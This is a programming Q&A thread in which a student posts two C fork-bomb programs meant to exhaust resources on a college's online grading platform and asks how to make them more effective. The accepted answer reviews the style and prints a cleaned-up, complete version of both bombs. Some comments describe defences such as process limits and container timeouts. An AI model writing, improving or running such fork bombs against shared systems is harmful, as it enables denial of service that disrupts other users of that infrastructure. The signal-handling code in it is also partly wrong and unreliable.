# Fork bomb in C to target testing platform

Tags: c

I am enrolled in a first year college subject for which we have a project in C. Our projects are assessed via an online testing platform. Me and a few colleagues were intrigued as to the harm we could cause to that platform and so we talked to the teacher about it. He laughed and told us "If you manage to write a program to bring the platform down, I'll give you max credit".

Naive as I were, I went and created a few different versions of a fork bomb thinking I could do something to the testing system. This was my attempt, which consists of two .c files (NOTE: the testing platform compiles our C files with the command `gcc -Wall -Wextra -ansi -pedantic -o out *.c *.h`):

First file: `bomb.c`

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>


#define FORK_ERR    { fprintf(stderr, "%s\n", "Error creating the damn child."); exit(1); }
#define EXEC_ERR    { fprintf(stderr, "%s\n", "Error on execv call."); exit(1); }


int
main()
{
    char * compile = "gcc -o oops oops.c";
    char * args[] = { NULL };
    int pid;
    sigset_t sigset;

    system(compile);

    while (1) {
        pid = fork();

        if (pid < 0) {
            FORK_ERR;
        } else if (pid == 0) {  /* child */
            setsid();

            pid = fork();

            if (pid < 0) {
                FORK_ERR;
            } else if (pid == 0) {  /* grandchild */
                execv("oops", args);
                EXEC_ERR;
            } /*else {
                exit(0);
            }*/
        } /*else {
            exit(0);
        }*/
    }

    exit(0);
}
```

Second file: `oops.c`

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>


void handle_abrt() { printf("SIGABRT\n"); }
void handle_chld() { printf("SIGCHLD\n"); }
void handle_int() { printf("SIGINT\n"); }
void handle_stop() { printf("SIGSTOP\n"); }
void handle_term() { printf("SIGTERM\n"); }
void handle_trap() { printf("SIGTRAP\n"); }


void
signal_setup(sigset_t * sigset)
{
    struct sigaction action_abrt, action_chld, action_int, action_stop, action_term, action_trap;

    action_abrt.sa_handler = handle_abrt;
    sigemptyset(&action_abrt.sa_mask);
    sigaction(SIGABRT, &action_abrt, NULL);

    action_chld.sa_handler = handle_chld;
    sigemptyset(&action_chld.sa_mask);
    sigaction(SIGABRT, &action_chld, NULL);

    action_int.sa_handler = handle_int;
    sigemptyset(&action_int.sa_mask);
    sigaction(SIGABRT, &action_int, NULL);

    action_stop.sa_handler = handle_stop;
    sigemptyset(&action_stop.sa_mask);
    sigaction(SIGABRT, &action_stop, NULL);

    action_term.sa_handler = handle_term;
    sigemptyset(&action_term.sa_mask);
    sigaction(SIGABRT, &action_term, NULL);

    action_trap.sa_handler = handle_trap;
    sigemptyset(&action_trap.sa_mask);
    sigaction(SIGABRT, &action_trap, NULL);

    sigemptyset(sigset);
    sigaddset(sigset, SIGABRT);
    sigaddset(sigset, SIGCHLD);
    sigaddset(sigset, SIGINT);
    sigaddset(sigset, SIGSTOP);
    sigaddset(sigset, SIGTERM);
    sigaddset(sigset, SIGTRAP);
}


int
main()
{
    int pid;
    int my_pid;
    sigset_t sigset;

    signal_setup(&sigset);

    while (1) {
        pid = fork();

        if (pid == 0)   /* child */
            while (1) {
                my_pid = getpid();  /* lotta system calls :) */
                printf("%d\n", my_pid);
            }
    }

    exit(0);
}
```

Some notes:

- To state my objective more clearly, I tried to create a program that would crash a system that ran it by depleting its resources, be it processing power or memory. It *works*, but I want to attack the testing system.
- I did see [this](https://superuser.com/questions/566958/how-to-stop-and-detect-the-fork-bomb) regarding ways to stop a fork bomb, which suggests limiting each user's ability to create processes, and thought that using `setsid` would solve it. But now that I think of it, a process from a different process group is still created by the same user (... I think?)
- I imagine the system runs tests on a Virtual Machine, but I did not know what to do about that.

What are some things I could improve so that my chances to bring down the testing system I mentioned earlier are higher?

Comment: There are also things like [Compiler Bombs](https://codegolf.stackexchange.com/q/69189)...

Comment: In my opinion, this question skirts the boundaries of the ["Do I want the code to be good code?"](/help/on-topic) rule, since the goal is to be as useless and wasteful as possible.

Comment: @200_success I disagree: A virus can be written poorly, or can be written meticulously, and the goal of the runtime effects being morally wrong or not shouldn't matter for the quality of the code.

Comment: @CacahueteFrito It's not the morality that I object to, but the criteria for what constitutes "quality", which makes it hard to review. A virus that is as sneaky and undetectable as possible? Sure. But a program that just sucks up resources? Anything that compiles without errors and that recursively forks will do; there's not much to say.

Comment: Thank you for the answers! @200_success I already know how to make a simple fork bomb. But as I mentioned in the question, I am looking for more advanced aspects of this program that I can tweak so that it works on a more robust testing system.

Comment: For what it's worth, the last time I implemented a service like your professor's auto-grader, it was run on a Kubernetes cluster with an [automatic timeout](https://stackoverflow.com/questions/44955786/how-to-set-a-time-limit-for-a-kubernetes-job) and a modest limit on the number of processes a user could launch, so it would be fairly impervious to such an attack, especially when used in conjunction with a decent firewall.  Your professor has probably done something similar.

Comment: @Edward thank you, that was the kind of answer that I was looking for! As to the limit to the number of processes, I assume it is not possible to overcome that limitation without sudo permissions?

Comment: That's correct.  In most Linux distros, it's set in `limits.conf` using `nproc`.  One can also use `nofile` to limit the number of files.  With reasonable limits and a short timeout (I used 16 seconds) any runaway container would simply be terminated and respawned, so even if you were to acquire `sudo` privileges on the container, the maximum time that could affect anything would be 16 seconds.

Comment: You shouldn't compile .h files.

Answer (score 4, accepted):

**- Headers**

You are making use of POSIX types and functions (`sigset_t` and `fork()` for example).

You should read the manuals for every function or type you use to know what you need in order to use them properly).

The man page of `fork()` (`man fork`) says that you need to include two headers to be able to use this function, and you forgot one of them:

```c
#include <sys/types.h>
#include <unistd.h>
```

---

**- POSIX**

Even if you include the POSIX headers, you need to define the posix macro so that you can use the POSIX features.  GCC (and many other compilers) used to define it for you, but recent versions of GCC don't (at least on my system), so either you define it in the source code (above any headers) or in the Makefile:

```c
#define _POSIX_C_SOURCE (200809L)
```

or

```c
CFLAGS  += -D _POSIX_C_SOURCE=200809L
```

---

**- Function-like macros:**

Macros that act like function calls (contrary to the typical macros that evaluate to a constant like `#define FOO (1)`)  should be used by the user like any other function (the user shouldn't care about something being a macro or a function (if possible, macros should even avoid double evaluation of parameters).

This function:

```c
void foo(void)
{
    /* contents */
}
```

written as a macro should be written this way, so that the user never notices that it is a macro (usually, function-like macros even have lowercase names to look like functions):

```c
#define foo()   do                                                      \
{                                                                       \
    /* contents */                                                      \
} while (0)
```

---

**- Macros that affect control flow (use `goto` instead!)**  (copied from the [Linux Kernel Coding Style](https://www.kernel.org/doc/html/v4.10/process/coding-style.html#macros-enums-and-rtl))

```c
#define FOO(x)  do                                                      \
{                                                                       \
                                                                        \
        if (blah(x) < 0)                                                \
                return  -EBUGGERED;                                     \
} while (0)
```

is a very bad idea. It looks like a function call but exits the calling function; don’t break the internal parsers of those who will read the code.

---

**- errno**

When reporting an error of a standard library function, if that function sets `errno`, you should also report the value of `errno`, which can be very helpful.

A simple call to `perror(...)` instead of `fprintf(stderr, ...)` is enough, although I prefer to show more info, and have developed a function-like macro for that (It works similarly to `void perror(const char *str)`):

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define alx_perror(str) do                                              \
{                                                                       \
        char    *str_   = str;                                          \
                                                                        \
        fprintf(stderr, "%s:%i: %s():\n", __FILE__, __LINE__, __func__);\
        if (str_)                                                       \
                fprintf(stderr, "   %s\n", str_);                       \
        fprintf(stderr, "E%i -  %s\n", errno, strerror(errno));         \
} while (0)
```

---

**- 80 character lines**

Please, don't use lines longer than 80 characters (there are exceptions; for example, don't break string literals).  It's very hard to read long lines.  The number 80 comes from the usual size of terminals, but it's still valid in modern editors: usually a splitted screen (or a StackExchange code block) shows around 85~90 characters, so if you write more, you have to scroll to the right to read it, which isn't very comfortable.

---

**- main**

The only two standard forms of `main` are:

```c
int main(void)
int main(int argc, char *argv[])
```

You should use one of those.

---

**- types**

Use the most appropriate types for the variables.

`pid` should be `pid_t pid;` instead of `int pid;`

---

**- Check error codes of standard library functions**

Standard library functions that return an error code do it for a good reason.  Check that error code.

```c
int status;

status = system(compile);
if (status)
        goto err_compile;
```

if you want to handle the status to know what failed, or if not, just:

```c
if (system(compile))
        exit(EXIT_FAILURE);
```

---

**- return or exit()**

At the end of main, you should use `return 0;`.  Although the behavior of `exit(0);` is the same, it is weird to read, and I had to check the name of the function to know if I'm in `main` or in another function, because I'm (and everyone else) used to read `return 0;` at the end of main.  It is more or less a non-written convention.  Everywhere else, do what you prefer, but not at the end of main.

---

**- EXIT_FAILURE**

`exit()` should be used with the macros `EXIT_SUCCESS` and `EXIT_FAILURE` instead of numbers, unless you want a specific exit failure code:

```c
exit(EXIT_FAILURE);
```

---

**- void**

Functions that don't accept parameters should be defined as `type foo(void)` and not `type foo()`.  Empty parentheses have different meaning in prototypes and definitions of functions, so it's better to avoid them, and use `(void)`.

---

**- unused variable**

`sigset` (in bomb.c) is not used, so remove it.

---

**- Unnecessary else**  (From Linux [checkpatch.pl](https://github.com/torvalds/linux/blob/master/scripts/checkpatch.pl))

"`else` is not generally useful after a break or return."

I add to that sentence a `continue`, `goto` or `exit()`.

Example:

```c
if (x)
        exit(EXIT_FAILURE);
else
        printf("Hello world!\n");
```

is equivalent to this, which is easier to read:

```c
if (x)
        exit(EXIT_FAILURE);
printf("Hello world!\n");
```

---

**- Explicitly discard return error codes**

If you don't care about the error code returned by a function, you should explicitly cast it to `(void)` so that it is clear that you don't care about it, and you didn't forget about it.

```c
(void)setsid();
```

---

**- Variables as short lived as possible**

Variables should live as short as possible.

In oops.c, the function `signal_setup()` asks for a parameter, but it is not needed.  You could replace it with a local variable.

---

Fixed code:

`bomb.c`:

```c
#define _POSIX_C_SOURCE (200809L)

#include <errno.h>
#include <signal.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <unistd.h>


#define alx_perror(str) do                                          \
{                                                                   \
    char    *str_   = str;                                          \
                                                                    \
    fprintf(stderr, "%s:%i: %s():\n", __FILE__, __LINE__, __func__);\
    if (str_)                                                       \
        fprintf(stderr, "   %s\n", str_);                           \
    fprintf(stderr, "E%i -  %s\n", errno, strerror(errno));         \
} while (0)


int main(void)
{
    char    *compile = "gcc -o oops oops.c";
    char    *args[] = {NULL};
    pid_t   pid;
    int     status;
    char    str[BUFSIZ];

    status = system(compile);
    if (status)
        goto err_sys;

    while (true) {
        pid = fork();
        if (pid < 0)
            goto err_fork;
        if (pid > 0)
            continue;

        /* child */
        (void)setsid();
        pid = fork();
        if (pid < 0)
            goto err_fork;
        if (!pid) {  /* grandchild */
            if (execv("oops", args))
                goto err_execv;
        }
    }

    return  0;

err_execv:
    alx_perror("Error on execv call.");
    exit(EXIT_FAILURE);
err_fork:
    alx_perror("Error creating the damn child.");
    exit(EXIT_FAILURE);
err_sys:
    (void)snprintf(str, sizeof(str), "Error compiling: status = %i;", status);
    alx_perror(str);
    exit(EXIT_FAILURE);
}
```

`oops.c`:

```c
#define _POSIX_C_SOURCE (200809L)

#include <signal.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>


void handle_abrt(void);
void handle_chld(void);
void handle_int(void);
void handle_stop(void);
void handle_term(void);
void handle_trap(void);
void signal_setup(void);


int main(void)
{
    pid_t   pid;
    pid_t   my_pid;

    signal_setup();

    while (true) {
        pid = fork();
        if (pid)
            continue;

        /* child */
        while (true) {
            my_pid = getpid();  /* lotta system calls :) */
            printf("%d\n", my_pid);
        }
    }

    return  0;
}


void handle_abrt(void)
{

    //
}

void handle_chld(void)
{

    //
}

void handle_int(void)
{

    //
}

void handle_stop(void)
{

    //
}

void handle_term(void)
{

    //
}

void handle_trap(void)
{

    //
}

void signal_setup(void)
{
    sigset_t            sigset;
    struct sigaction    action_abrt;
    struct sigaction    action_chld;
    struct sigaction    action_int;
    struct sigaction    action_stop;
    struct sigaction    action_term;
    struct sigaction    action_trap;

    action_abrt.sa_handler = handle_abrt;
    (void)sigemptyset(&action_abrt.sa_mask);
    (void)sigaction(SIGABRT, &action_abrt, NULL);

    action_chld.sa_handler = handle_chld;
    (void)sigemptyset(&action_chld.sa_mask);
    (void)sigaction(SIGABRT, &action_chld, NULL);

    action_int.sa_handler = handle_int;
    (void)sigemptyset(&action_int.sa_mask);
    (void)sigaction(SIGABRT, &action_int, NULL);

    action_stop.sa_handler = handle_stop;
    (void)sigemptyset(&action_stop.sa_mask);
    (void)sigaction(SIGABRT, &action_stop, NULL);

    action_term.sa_handler = handle_term;
    (void)sigemptyset(&action_term.sa_mask);
    (void)sigaction(SIGABRT, &action_term, NULL);

    action_trap.sa_handler = handle_trap;
    (void)sigemptyset(&action_trap.sa_mask);
    (void)sigaction(SIGABRT, &action_trap, NULL);

    (void)sigemptyset(&sigset);
    (void)sigaddset(&sigset, SIGABRT);
    (void)sigaddset(&sigset, SIGCHLD);
    (void)sigaddset(&sigset, SIGINT);
    (void)sigaddset(&sigset, SIGSTOP);
    (void)sigaddset(&sigset, SIGTERM);
    (void)sigaddset(&sigset, SIGTRAP);
}
```

Comment: Calling printf from inside a signal handler invokes undefined behavior.

Comment: @RolandIllig Thanks. I know close to nothing about signals, so I just copied that from the question. I'll fix it so that no one copies that.